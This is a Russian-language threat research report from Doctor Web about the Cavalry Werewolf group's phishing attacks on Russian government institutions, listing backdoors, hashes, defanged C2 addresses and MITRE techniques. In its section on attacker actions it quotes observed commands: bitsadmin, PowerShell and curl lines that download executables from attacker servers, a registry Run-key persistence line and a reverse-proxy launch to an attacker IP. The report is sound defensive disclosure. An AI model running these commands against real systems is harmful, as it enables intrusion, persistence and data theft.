Для пользователей Dr.Web Security Space для мобильных устройств, скачавших приложение из Google Play, использующих Dr.Web по подписке (Dr.Web Мобильный или Dr.Web Расширенный) или Dr.Web Mobile Security Suite, обновление пройдет в штатном режиме.

Хакерская группировка Cavalry Werewolf атакует российские государственные учреждения

Thu, 06 Nov 2025 00:00:00 GMT

Скачать PDF

6 ноября 2025 года

Введение

В июле 2025 года в компанию «Доктор Веб» обратился клиент из государственного сектора Российской Федерации с подозрением о возможной компрометации внутренней сети. Гипотеза возникла в связи с тем, что клиент зафиксировал рассылку нежелательных сообщений с одного из корпоративных почтовых ящиков. Проведенное нашей антивирусной лабораторией расследование инцидента показало, что учреждение подверглось целевой атаке со стороны хакерской группировки, которую специалисты «Доктор Веб» идентифицировали как Cavalry Werewolf. Одной из целей кампании был сбор конфиденциальной информации и данных о конфигурации сети.

В ходе экспертизы удалось выявить ранее неизвестные вредоносные программы, в том числе инструменты с открытым исходным кодом. Среди них — различные бэкдоры, позволяющие дистанционно выполнять команды в атакуемых системах и подготовить площадку для разведки и дальнейшего закрепления в сетевой инфраструктуре.

В данном исследовании мы расскажем о выявленных инструментах хакеров Cavalry Werewolf, рассмотрим особенности группировки и характерные для злоумышленников действия в скомпрометированной сети.

Общие сведения об атаке и используемые инструменты

Для получения первоначального доступа к одному из компьютеров злоумышленники использовали распространенный вектор проникновения — фишинговые электронные письма с прикрепленным к ним вредоносным ПО, замаскированным под документы. В данном случае сообщения содержали неизвестный на момент атаки бэкдор BackDoor.ShellNET.1, который основан на ПО с открытым кодом Reverse-Shell-CS. Он позволяет дистанционно подключаться к зараженным компьютерам через обратный шелл и выполнять различные команды. Эта вредоносная программа располагалась в защищенном паролем архиве и, в зависимости от рассылки, имела различные имена.

Варианты имен файлов BackDoor.ShellNET.1
Службеная записка от 16.06.2025___________________________.exe
О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe
О проведении личного приема граждан список участников.exe
О работе почтового сервера план и проведенная работа.exe

Пример фишингового письма с BackDoor.ShellNET.1. Атакующие предлагают потенциальной жертве ознакомиться с «документом» и указывают пароль для распаковки архива

Используя BackDoor.ShellNET.1, злоумышленники продолжили закрепление в целевой системе. Они загрузили несколько вредоносных программ через стандартное для ОС Windows средство Bitsadmin (C:\Windows\SysWOW64\bitsadmin.exe), предназначенное для управления заданиями по передаче файлов. Приложение запускалось с набором определенных ключей командной строки и от имени текущего администратора системы, как показано на примере ниже:

cmd: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe 
C:\users\public\downloads\winpot.exe

Первой из угроз, загруженных через BackDoor.ShellNET.1, была троянская программа-стилер Trojan.FileSpyNET.5. С ее помощью киберпреступники скачали хранившиеся на компьютере документы в форматах .doc, .docx, .xlsx и .pdf, текстовые файлы (.txt), а также изображения (.jpg, .png).

Затем атакующие установили бэкдор BackDoor.Tunnel.41 (представляет собой ПО с открытым исходным кодом ReverseSocks5) с целью создания SOCKS5-туннелей и незаметного подключения к компьютеру для дальнейшего выполнения на нем команд, в том числе — с возможностью установки другого вредоносного ПО.

Инструменты Cavalry Werewolf

Расследование данного инцидента позволило выявить не только указанные выше вредоносные приложения, но и множество других инструментов группировки, которые хакеры используют для проведения таргетированных атак. Отметим, что вирусописатели из Cavalry Werewolf не ограничиваются единым набором вредоносных программ и постоянно пополняют свой арсенал. Поэтому инструменты для проникновения в целевые системы, а также последующие в цепочке заражения стадии могут отличаться в зависимости от атакуемой организации.

Точка входа

Вредоносные программы в фишинговых письмах от Cavalry Werewolf являются первыми ступенями в цепочке заражения. При этом они могут быть представлены разным типом вредоносного ПО. Вирусные аналитики «Доктор Веб» выявили следующие варианты:

скрипты (BAT.DownLoader.1138);
исполняемые файлы (Trojan.Packed2.49708, Trojan.Siggen31.54011, BackDoor.Siggen2.5463, BackDoor.RShell.169, BackDoor.ReverseShell.10).

BAT.DownLoader.1138

Является пакетным файлом, который загружает в целевую систему PowerShell-бэкдор PowerShell.BackDoor.109. С его помощью злоумышленники скачивают и запускают на компьютере другие вредоносные программы.

Известные имена файлов BAT.DownLoader.1138	SHA1-хеш	С2-сервер
scan26_08_2025.bat	d2106c8dfd0c681c27483a21cc72d746b2e5c18c	168[.]100.10[.]73

Trojan.Packed2.49708

Устанавливает бэкдор BackDoor.Spy.4033, который в зашифрованном виде хранится в его теле. Этот бэкдор позволяет атакующим выполнять команды в инфицированной системе через обратный шелл.

Известные имена файлов Trojan.Packed2.49708	SHA1-хеш	С2-сервер
О проведении личного приема граждан список участников план и проведенная работа.exe C:\Windows\2o1nzu.exe	5684972ded765b0b08b290c85c8fac8ed3fea273	185[.]173.37[.]67
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe	29ee3910d05e248cfb3ff62bd2e85e9c76db44a5	185[.]231.155[.]111
О работе почтового сервера план и проведенная работа.exe Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe План-протокол встречи о сотрудничестве представителей должн.лиц.exe	ce4912e5cd46fae58916c9ed49459c9232955302	109[.]172.85[.]95
C:\Windows\746wljxfs.exe	653ffc8c3ec85c6210a416b92d828a28b2353c17	185[.]173.37[.]67
—	b52e1c9484ab694720dc62d501deca2aa922a078	109[.]172.85[.]95

Trojan.Siggen31.54011

Устанавливает бэкдор BackDoor.Spy.4038, который в зашифрованном виде хранится в его теле. Этот бэкдор позволяет атакующим выполнять команды в инфицированной системе через обратный шелл.

Trojan.Siggen31.54011 функционально схож с вредоносной программой Trojan.Packed2.49708, но имеет несколько иной алгоритм извлечения полезной нагрузки.

SHA1-хеш	С2-сервер
baab225a50502a156222fcc234a87c09bc2b1647	109[.]172.85[.]63
93000d43d5c54b07b52efbdad3012e232bdb49cc	109[.]172.85[.]63

BackDoor.Siggen2.5463

Выполняет задания киберпреступников и управляется ими через Telegram-бот. Основная функциональность вредоносной программы расположена в PowerShell-коде, скрытом в ее теле.

Известные имена файлов BackDoor.Siggen2.5463	SHA1-хеш	Полезная нагрузка
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe system.exe	c96beb026dc871256e86eca01e1f5ba2247a0df6	PowerShell.BackDoor.108

BackDoor.RShell.169

Позволяет злоумышленникам дистанционно подключаться к зараженным компьютерам через обратный шелл для выполнения различных команд.

Известные имена файлов BackDoor.RShell.169	SHA1-хеш	С2-сервер
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe	633885f16ef1e848a2e057169ab45d363f3f8c57	109[.]172.85[.]63

BackDoor.ReverseShell.10

Запускает обратный шелл и обеспечивает злоумышленникам дистанционный доступ к системе.

Известные имена файлов BackDoor.ReverseShell.10	SHA1-хеш	С2-сервер
к проектам.exe Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe	dd98dcf6807a7281e102307d61c71b7954b93032	195[.]2.78[.]133
Служебная записка от 20.08.2025 .exe Служебная записка от 12.08.2025 .exe	f546861adc7c8ca88e3b302d274e6fffb63de9b0	62[.]113.114[.]209

Последующие ступени заражения

Нами были обнаружены следующие вредоносные программы, которые могут в дальнейшем устанавливаться на зараженные устройства после компрометации:

Trojan.Inject5.57968

Троянская программа с зашифрованным в ее теле бэкдором, который позволяет атакующим загружать вредоносные приложения на зараженный компьютер. Расшифровка полезной нагрузки выполняется в несколько шагов, на одном из которых вредоносный массив данных инжектируется в процесс приложения aspnet_compiler.exe из пакета Microsoft .NET Framework. В дальнейшем полностью расшифрованный бэкдор работает в контексте процесса этого легитимного приложения.

Изучение активности Trojan.Inject5.57968 при помощи «песочницы» интерактивного анализатора угроз Dr.Web vxCube

Известные имена файлов Trojan.Inject5.57968	SHA1-хеш	С2-сервер	Полезная нагрузка
pickmum1.exe	e840c521ec436915da71eb9b0cfd56990f4e53e5	64[.]95.11[.]202	Trojan.PackedNET.3351
mummyfile1.exe	22641dea0dbe58e71f93615c208610f79d661228	64[.]95.11[.]202	Trojan.PackedNET.3351

BackDoor.ShellNET.2

Бэкдор, который управляется через Telegram-бот и выполняет команды атакующих.

Известные имена файлов BackDoor.ShellNET.2	SHA1-хеш
win.exe	1957fb36537df5d1a29fb7383bc7cde00cd88c77

BackDoor.ReverseProxy.1

Бэкдор на основе открытого ПО ReverseSocks5, запускающий обратный SOCS5-прокси в инфицированной системе для получения дистанционного доступа к компьютеру. BackDoor.ReverseProxy.1 запускается через командную строку cmd.exe с параметром -connect IP для подключения к нужному сетевому адресу. Известны модификации бэкдора с зашитыми адресами.

Выявлены следующие IP:

78[.]128.112[.]209 (указывался в параметре запуска)
96[.]9.125[.]168 (указывался в параметре запуска)
188[.]127.231[.]136 (зашит в коде)

Известные имена файлов BackDoor.ReverseProxy.1	SHA1-хеш
revv2.exe	6ec8a10a71518563e012f4d24499b12586128c55

Trojan.Packed2.49862

Trojan.Packed2.49862 — это троянские версии легитимных программ, в которые злоумышленники внедрили вредоносный код. Вирусные аналитики «Доктор Веб» встречали вредоносные модификации архиваторов WinRar и 7-Zip, средства разработки Visual Studio Code, текстового редактора AkelPad и ряда других приложений. Среди них, например, была программа Sumatra PDF Reader, которую киберпреступники выдавали за мессенджер MAX. Такие модификации перестают выполнять основную функциональность и при запуске инициализируют только добавленную к ним троянскую часть.

В зависимости от целей киберпреступников в этих модификациях могут скрываться самые разные вредоносные программы. Среди них:

BackDoor.ReverseProxy.1 (ReverseSocks5)
BackDoor.Shell.275 (AdaptixC2)
BackDoor.AdaptixC2.11 (AdaptixC2)
BackDoor.Havoc.16 (Havoc)
BackDoor.Meterpreter.227 (CobaltStrike)
Trojan.Siggen9.56514 (AsyncRAT)
Trojan.Clipper.808

Известные имена файлов Trojan.Packed2.49862	SHA1-хеш	С2-сервер	Полезная нагрузка
code.exe rev2.exe	8279ad4a8ad20bf7bbca0fc54428d6cdc136b776	188[.]127.231[.]136	BackDoor.ReverseProxy.1
code.exe revv.exe	a2326011368d994e99509388cb3dc132d7c2053f	192[.]168.11[.]10	BackDoor.ReverseProxy.1
7zr.exe winload.exe system.exe Recorded_TV.exe	451cfa10538bc572d9fd3d09758eb945ac1b9437	77[.]232.42[.]107	BackDoor.Shell.275
Command line RAR winlock.exe Recorded_TV.exe	a5e7e75ee5c0fb82e4dc2f7617c1fe3240f21db2	77[.]232.42[.]107	BackDoor.AdaptixC2.11
winsrv.exe firefox.exe	bbe3a5ef79e996d9411c8320b879c5e31369921e	94[.]198.52[.]210	BackDoor.AdaptixC2.11
AkelPad.exe	e8ab26b3141fbb410522b2cbabdc7e00a9a55251	78[.]128.112[.]209	BackDoor.Havoc.16
7z.exe	dcd374105a5542ef5100f6034c805878153b1205	192[.]168.88[.]104	BackDoor.Meterpreter.227
7z.exe	e51a65f50b8bb3abf1b7f2f9217a24acfb3de618	192[.]168.1[.]157	Trojan.Siggen9.56514
7z.exe chromedriver.exe	d2a7bcbf908507af3d7d3b0ae9dbaadd141810a4	Telegram-бот	Trojan.Clipper.808
7z 7z.exe svc_host.exe dzveo09ww.exe	c89c1ed4b6dda8a00af54a0ab6dca0630eb45d81	Telegram-бот	Trojan.Clipper.808
—	b05c5fe8b206fb0d168f3a1fc91b0ed548eb46f5	Telegram-бот	Trojan.Clipper.808
max - для бизнеса.exe	b4d0d2bbcfc5a52ed8b05c756cfbfa96838af231	89[.]22.161[.]133	BackDoor.Havoc.16

Характерные для группировки действия внутри скомпрометированной сети

После проникновения в компьютерную инфраструктуру целевой организации злоумышленники могут выполнять различные действия по сбору данных и дальнейшему закреплению в системе.

Для получения информации о зараженном компьютере запускают команды:

whoami — получить сведения о текущем пользователе;
dir C:\\users\\<user>\\Downloads — получить список файлов в каталоге «Загрузки» текущего пользователя;
dir C:\\users\\public\\pictures\\ — получить список файлов в каталоге «Изображения» из общей директории (с целью определить какие вредоносные программы уже были загружены в систему);
ipconfig /all — получить конфигурацию сети;
net user — получить список всех пользователей в системе.

Для сбора информации о прокси-сервере и для проверки работоспособности сети используют команды:

powershell -c '[System.Net.WebRequest]::DefaultWebProxy.GetProxy(\"https://google.com\")'
curl -I https://google.com
curl -I https://google.com -x <proxy>

Для настройки параметров сети используют:

утилиту командной строки netsh, входящую в состав ОС Windows.

Для последующей доставки вредоносных инструментов в систему используют легитимные инструменты:

PowerShell (например: powershell -Command Invoke-WebRequest -Uri \"hxxps[:]//sss[.]qwadx[.]com/revv3.exe\" -OutFile \"C:\\users\\public\\pictures\\rev.exe);
Bitsadmin (например: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/rever.exe C:\\users\\public\\pictures\\rev3.exe);
curl (например: curl -o C:\\users\\public\\pictures\\rev.exe hxxp[:]//195[.]2.79[.]245/code.exe);

Для закрепления в системе:

Могут модифицировать системный реестр Windows (например: REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Service /t REG_SZ /d C:\\users\\public\\pictures\\win.exe /f).

Для запуска своих инструментов используют командный интерпретатор cmd.exe. Например:

C:\\users\\public\\libraries\\revv2.exe -connect 78[.]128.112[.]209:10443 — для запуска BackDoor.ReverseProxy.1;
C:\\users\\public\\pictures\\732.exe — для запуска BackDoor.Tunnel.41.

Для удаления инструментов могут использовать PowerShell. Например:

powershell -Command Remove-Item C:\\users\\public\\pictures\\732.exe

Злоумышленники также могут периодически проверять доступность С2-серверов через команду ping.

Особенности группировки Cavalry Werewolf

Можно выделить следующие особенности злоумышленников из группировки Cavalry Werewolf:

предпочитают использовать ПО с открытым кодом — как в исходном виде, так и в качестве основы для собственных разработок;
основными инструментами являются различные бэкдоры с функциональностью обратного шелла, позволяющие дистанционно выполнять команды в зараженных системах;
с целью сокрытия могут встраивать вредоносный код в изначально безобидные приложения;
часто применяют Telegram API для управления зараженными компьютерами;
для распространения первой ступени заражения проводят фишинговые рассылки якобы от имени государственных структур и используют для этого скомпрометированные email-адреса;
для загрузки последующих стадий заражения на целевое устройство используют директории C:\\users\\public\\pictures, C:\\users\\public\\libraries, C:\\users\\public\\downloads.

Подробные технические описания выявленных инструментов Cavalry Werewolf находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».

Матрица MITRE

Этап	Техника
Первоначальный доступ	Целевой фишинг с вложением (T1566.001)
Выполнение	Выполнение с участием пользователя (T1204) PowerShell (T1059.001) Командная оболочка Windows (T1059.003)
Закрепление	Ключи запуска в реестре Windows / Каталог автозагрузки (T1547.001) BITS-задачи (T1197)
Повышение привилегий	Обход контроля учетных записей (T1548.002)
Предотвращение обнаружения	BITS-задачи (T1197)
Организация управления	Внешний прокси-сервер (T1090.002) Двусторонняя связь (T1102.002)
Эксфильтрация данных	Эксфильтрация по каналу управления (T1041) Эксфильтрация через веб-службу (T1567)

Индикаторы компрометации